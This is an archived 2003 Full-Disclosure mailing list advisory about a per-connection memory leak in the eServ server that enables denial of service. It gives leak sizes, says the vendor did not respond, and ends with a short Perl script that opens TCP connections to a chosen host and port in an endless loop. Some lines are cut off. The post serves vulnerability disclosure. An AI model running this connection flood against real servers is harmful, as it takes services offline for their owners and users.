[Full-Disclosure] eServ Memory Leak Enables Denial of Service Attacks

From: Matthew Murphy (mattmurphyat_private)
Date: Sun May 11 2003 - 09:21:43 PDT

  • Next message: Matthew Murphy: "[VulnWatch] eServ Memory Leak Enables Denial of Service Attacks"

    eServ Memory Leak Enables Denial of Service Attacks
    I. Product Description
    eServ is a hybrid Web server (HTTP), FTP server, mail server (POP3, SMTP,
    Finger), news server (NNTP), and proxy server.  It provides all these
    services in a single package, so that administrators are not required to run
    multiple different packages to support these protocols.
    II. Vulnerability Description
    eServ's connection handling routine contains a memory leak that may be
    exploited to cause the eServ daemon to become unavailable.  Upon receiving a
    connection, the server allocates a block of memory on the heap between 8 and
    32 kilobytes in size.  The reason for this size variance was not isolated.
    This block of memory is not freed on disconnect, leading it to leak.  After
    several thousand successful connections, memory use on the system becomes
    exceedingly high.  If memory use on the system becomes excessively high, the
    system may become unusable.
    III. Impact
    An attacker who can repeatedly establish connections with the eServ daemon
    can cause services running on the vulnerable system (including other
    services outside of eServ's process) to fail.  The vulnerability can
    actually be exploited by accident on high-traffic sites -- each connection
    causes a leak.  After about 1,000 connections, anywhere between 7.81 MB and
    31.25 MB may leak.
    To deprive an average server system of resources to the point of failure, a
    significant number of connections is required.  After 10,000 connections,
    78.1 MB to 312.5 MB may leak; in my experience, about 50,000 connections is
    sufficient to cause system failure.  At this point, 390.5 MB to 1.52 GB has
    IV. Vendor Contact
    I attempted to contact the vendor via infoat_private and supportat_private
    The former address bounced, and no response was received from the second
    contact attempt.  eServ has a horrible security record, and I recommend
    using a production server for internet sites.
    V. Exploit
    #LEGAL NOTICE: Don't test this on networks you don't administer,
    #and do not test this tool on networks you don't own without
    #permission of the network owner.  You are responsible for all
    #damage due to your use of this tool.
    use IO::Socket;
    print "$0: eServ Remote DoS Exploit\r\n";
    print "By Matthew Murphy \<mattmurphy\@kc.rr.com\>\r\n\r\n";
    print "Server hostname\: ";
    $host = trim(chomp($line = <STDIN>));
    print "Service port to probe\: ";
    $port = trim(chomp($line = <STDIN>));
    print "\r\nBeginning probe -- stop with CTRL+C\r\n";
    while (1) {
     $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port");
     undef $f;
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

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